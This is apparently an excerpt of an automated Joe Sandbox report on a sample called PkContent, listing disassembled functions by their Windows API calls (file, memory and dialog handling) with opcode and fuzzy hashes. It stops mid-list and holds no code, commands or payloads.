                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                      • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                      • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                      APIs
                                                      • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                      • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree
                                                      • String ID:
                                                      • API String ID: 3394109436-0
                                                      • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                      • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                      • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                      • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                      • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                      • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                      APIs
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID:
                                                      • API String ID: 4115351271-0
                                                      • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                      • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                      APIs
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                      • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                      • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                      • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                      • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                      • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                      • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                      • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                      • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                      • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                      • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
